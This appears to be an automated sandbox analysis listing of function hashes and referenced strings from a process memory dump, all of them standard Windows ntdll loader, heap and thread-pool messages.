                                                                                                                                    • Instruction ID: 369a7155a3c4b2a271470fc5bf2f38f5af22f6c10a55d6822b7e2011f66a80e4
                                                                                                                                    • Opcode Fuzzy Hash: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
                                                                                                                                    • Instruction Fuzzy Hash: 37426CB2900715DFDB61DF28C980BAAB7F8BF44314F1445A9E98DEB242D770A984CF60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                    • API String ID: 0-379654539
                                                                                                                                    • Opcode ID: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
                                                                                                                                    • Instruction ID: 446a4967066c8e52600aea194c30a98db43c2d00a685ea1cbfce339dc7eb60d8
                                                                                                                                    • Opcode Fuzzy Hash: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
                                                                                                                                    • Instruction Fuzzy Hash: F1C19B74548382CFD715CF58C144F6AB7E8FF84704F04496AF99A8B291E738CA49CB92
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializeProcess, xrefs: 01978422
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01978421
                                                                                                                                    • @, xrefs: 01978591
                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0197855E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-1918872054
                                                                                                                                    • Opcode ID: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
                                                                                                                                    • Instruction ID: 2aa38375ad087932ecb337df4bb9f3936c2b04daeb8e294580585fb35150ac3e
                                                                                                                                    • Opcode Fuzzy Hash: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
                                                                                                                                    • Instruction Fuzzy Hash: 0C916871508345AFE721EF65CC85FABBAECBF84784F40092EFA8C96151E270D944CB62
                                                                                                                                    Strings
                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019B21D9, 019B22B1
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019B21DE
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019B22B6
                                                                                                                                    • .Local, xrefs: 019728D8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                    • API String ID: 0-1239276146
                                                                                                                                    • Opcode ID: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
                                                                                                                                    • Instruction ID: b4c5edd95fae2561be4ab7e3058d98f36014fbe25cd5b1d220d2f1f9aac516c7
                                                                                                                                    • Opcode Fuzzy Hash: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
                                                                                                                                    • Instruction Fuzzy Hash: FDA1B031910229DBDB25CF68C984BE9B7B5FF58354F2845E9D90CAB251D730AE81CF90
                                                                                                                                    Strings
                                                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 019B342A
                                                                                                                                    • RtlDeactivateActivationContext, xrefs: 019B3425, 019B3432, 019B3451
                                                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019B3456
                                                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019B3437
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
• Opcode ID: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
• Instruction ID: de4a75749a2708e1a0de6e3d4823bbe1c098361287fd4fcbc3ee0bee879bc4aa
• Opcode Fuzzy Hash: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
• Instruction Fuzzy Hash: 356121366007129BD722CF1DC981FBAB7EABF80B51F19852DE85D9B242D734E901CB91
Strings
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019A1028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019A0FE5
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019A10AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019A106B
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
• Instruction ID: c5656b6ebc36bef3f380fd7b47d1181235f29b8adbf3110a396a85d0d161e7ae
• Opcode Fuzzy Hash: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
• Instruction Fuzzy Hash: 9E71CDB19043459FCB21EF18C884F9B7BADAF96764F400868F94D8B246D334D589CBD2
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 019AA9A2
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019AA992
• apphelp.dll, xrefs: 01962462
• LdrpDynamicShimModule, xrefs: 019AA998
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
• Instruction ID: cb4de5b81f391a4724a2310160ab95054d5022aceab9826f932cf103a342628a
• Opcode Fuzzy Hash: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
• Instruction Fuzzy Hash: 4A316879A00202ABDB32DF5DDC85FAA7BB9FFC8B00F550419F8096B245C7B49946C790
Strings
• HEAP[%wZ]: , xrefs: 01953255
• HEAP: , xrefs: 01953264
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0195327D
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
• Instruction ID: f0a151fba94ad02f85fee498b7772fa67610108a17811ecc79c93493052ccbfc
• Opcode Fuzzy Hash: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
• Instruction Fuzzy Hash: C692BC71A04249DFDB65CF68C440BAEBBF5FF48304F188499E84AAB392D735AA45CF50
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
• Instruction ID: 032e0c581ba4a4c4c47e61bfb87c54c56400ce83143bf8beac20f86da3e62118
• Opcode Fuzzy Hash: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
• Instruction Fuzzy Hash: FDF1AB30B00606DFEB55CF68C894F6AB7B5FF84304F198568E91AAB385D730E985CB91
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
• Opcode ID: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
• Instruction ID: a3c25f7fb427ffaaf6b57667a5c0d35219a93e314cd2ad85d083e27ceb52bbb9
• Opcode Fuzzy Hash: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
• Instruction Fuzzy Hash: 53C260716083419FD729CF68C881BABBBE9BFC8754F04892DE98D97241D734D845CBA2
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
• Instruction ID: 1548142f0d65dd7dcca3cc9ea8073d25d4a4b87d6292b98f17ef821ab3f53100
• Opcode Fuzzy Hash: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
• Instruction Fuzzy Hash: F6A14B759116299BDF31DF68CC88BAAB7B8EF88711F1001EAE90DA7250D7359E84CF50
Strings
• Failed to allocated memory for shimmed module list, xrefs: 019AA10F
• minkernel\ntdll\ldrinit.c, xrefs: 019AA121
• LdrpCheckModule, xrefs: 019AA117
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
• Instruction ID: 573f599d3dbf714891d0db4e66b22b48aeebaf67c2f23871568cfbfccccbce2a
• Opcode Fuzzy Hash: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
• Instruction Fuzzy Hash: A671B374E00205AFDB25DF68CD85BAEB7F8FB88304F18446DE4099B255D739A946CB60
Strings
• LdrpInitializePerUserWindowsDirectory, xrefs: 019B82DE
• minkernel\ntdll\ldrinit.c, xrefs: 019B82E8
• Failed to reallocate the system dirs string !, xrefs: 019B82D7
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
• Opcode ID: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
• Instruction ID: 2b4115b020d194cce72932c3e6ec201f7f40cf0fab243983db86303b430b5423
• Opcode Fuzzy Hash: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
• Instruction Fuzzy Hash: 6341D175544302ABD721EB68DD85B9BBBECBF89790F00492AF94DD3250EB70D901CB92
Strings
• @, xrefs: 019FC1F1
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019FC1C5
• PreferredUILanguages, xrefs: 019FC212
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
• Opcode ID: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
• Instruction ID: e45cdb0e5a60d41cf92e06514e1543f8bc3312d75fce74bfeab0d4eac28fd10d
• Opcode Fuzzy Hash: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
• Instruction Fuzzy Hash: 91414F75A0020DBBEB11DAD8C851FEEBBBCEB54705F14806AEA0DA7240D774DA448B50
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
• Opcode ID: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
• Instruction ID: 209dc5b7c44760f3770bf9f831288cc5c0c80248ca936c41a7c36166f34aafed
• Opcode Fuzzy Hash: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
• Instruction Fuzzy Hash: 7F411331A003598BEB26DFE9C840BADBBB8FFA5340F14445ADA49FBB91D7348901CB51
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 019C4899
• LdrpCheckRedirection, xrefs: 019C488F
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019C4888
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
• Opcode ID: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
• Instruction ID: 8d22a90f908aa216d366c49d324148e9dd1d69e27dc8c51036b2e857a7940ac4
• Opcode Fuzzy Hash: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
• Instruction Fuzzy Hash: 89419D32B046519BDB22CE68D860A27BBE8AF89E51B05066DFDCC97255D730E801CB93
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
• Opcode ID: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
• Instruction ID: 2ffaeed25977beeb7884c48463f9fe15ac744010b6a9afaaca72d0d1ccab7634
• Opcode Fuzzy Hash: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
• Instruction Fuzzy Hash: 6B11E1323141029FEB69CB18C481F7AB3E9EF80B1AF1A8519F80EDB251DB30D849C791
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 019C2104
• LdrpInitializationFailure, xrefs: 019C20FA
• Process initialization failed with status 0x%08lx, xrefs: 019C20F3
Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2986994758
                                                                                                                                    • Opcode ID: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
                                                                                                                                    • Instruction ID: bd7553582a527c1e701d2931248374985cfe8dfbedf3e226caadfc0f48798c16
                                                                                                                                    • Opcode Fuzzy Hash: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
                                                                                                                                    • Instruction Fuzzy Hash: EBF0AF39A40318ABEA24EB4C9D46FA93B6CFB81E54F100069F64867285D2E0A941C792
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: #%u
                                                                                                                                    • API String ID: 48624451-232158463
                                                                                                                                    • Opcode ID: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
                                                                                                                                    • Instruction ID: 6a3065ca65c623510c8a0b0ffad245c3a72d7fb75bbfd9d1e2381460e94ffc69
                                                                                                                                    • Opcode Fuzzy Hash: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
                                                                                                                                    • Instruction Fuzzy Hash: 30714C71A0014A9FDB01DF98C980FAEBBF8BF48744F194065E909A7251E674EE05CBA1
                                                                                                                                    Strings
                                                                                                                                    • LdrResSearchResource Enter, xrefs: 0194AA13
                                                                                                                                    • LdrResSearchResource Exit, xrefs: 0194AA25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                    • API String ID: 0-4066393604
                                                                                                                                    • Opcode ID: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
                                                                                                                                    • Instruction ID: 504aff2f34a9a8b67f6ddc204f82518cfce05dc1290574dbbe9e9387ccef7b98
                                                                                                                                    • Opcode Fuzzy Hash: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
                                                                                                                                    • Instruction Fuzzy Hash: FFE18271E802199FEB22CF99C980FAEBBBEFF54311F50442AE90AE7251D7349944CB50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `$`
                                                                                                                                    • API String ID: 0-197956300
                                                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction ID: 180b1c94abb03f8c75ec0fa4180756701f78bb89244d64de1a0699537963e1b6
                                                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction Fuzzy Hash: 5DC19F312043429BE726CF28D841B6BBBE5AFC4318F188A2DF696CB2D1D775E505CB41
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                    • Opcode ID: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
                                                                                                                                    • Instruction ID: bb6f964ab13ea882953204992d8b34d36bce3cdf00f6b4b0320768528f472ae5
                                                                                                                                    • Opcode Fuzzy Hash: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
                                                                                                                                    • Instruction Fuzzy Hash: 31614A71E006199FDB15DFA88980BEEBBB9FB48700F14846DE65DEB251D731A900CB51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$MUI
                                                                                                                                    • API String ID: 0-17815947
                                                                                                                                    • Opcode ID: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
                                                                                                                                    • Instruction ID: 50f052725fb6c43b7cd57cddc53e8e6ba7eb4d9fa1ca0af1d446dfe98565e9eb
                                                                                                                                    • Opcode Fuzzy Hash: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
                                                                                                                                    • Instruction Fuzzy Hash: 4851FA71E0021DAFDB11DFA9CC94EEEBBFDAB44754F100529E619F7250D6309905CB60
                                                                                                                                    Strings
                                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0194063D
                                                                                                                                    • kLsE, xrefs: 01940540
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                    • API String ID: 0-2547482624
                                                                                                                                    • Opcode ID: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
                                                                                                                                    • Instruction ID: 765db01008f92531c76ce721210b54467943aa506b19d595a5163b53c24140df
                                                                                                                                    • Opcode Fuzzy Hash: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
                                                                                                                                    • Instruction Fuzzy Hash: F351BB715047429BD724EF69C440AE7BBE8AF84305F18893EFAAE87241E770D545CB92
                                                                                                                                    Strings
                                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0194A2FB
                                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0194A309
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                    • API String ID: 0-2876891731
                                                                                                                                    • Opcode ID: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
                                                                                                                                    • Instruction ID: 852fa0bb6b1a999bac4379e7027f4b7a6ecbc39595c516cf989a78bf9e18ab64
                                                                                                                                    • Opcode Fuzzy Hash: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
                                                                                                                                    • Instruction Fuzzy Hash: 0241F330A44649CFEB25CF59C440F6DBBB8FF85701F144469E90ADB291E375D940CB80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                    • Opcode ID: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
                                                                                                                                    • Instruction ID: 680078c1118b86c2f4c37fda896333582503475cffd3559a155fdbc543995b88
                                                                                                                                    • Opcode Fuzzy Hash: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
                                                                                                                                    • Instruction Fuzzy Hash: B901ADB2240704AFE312DF14CD46B1A77E8EB85715F058939A64CC7190E334D904CB46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: MUI
                                                                                                                                    • API String ID: 0-1339004836
                                                                                                                                    • Opcode ID: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
                                                                                                                                    • Instruction ID: 67fdc52ee4f838634fcceaf404442a340fdc86313b403f8134b771cf3d965220
                                                                                                                                    • Opcode Fuzzy Hash: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
                                                                                                                                    • Instruction Fuzzy Hash: C8826A79E012198FEB25CFA9C880FEDBBB5BF48710F14816AE95DAB391D7309941CB50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
                                                                                                                                    • Instruction ID: 75abaf251f20eb36666d90271c551ce8a40683d00998c1d5fe02faec6f71f22d
                                                                                                                                    • Opcode Fuzzy Hash: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
                                                                                                                                    • Instruction Fuzzy Hash: D8918471900219AFEB21DF95CD85FAEBBB8EF54B50F100059F609BB291D774AD00CB61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
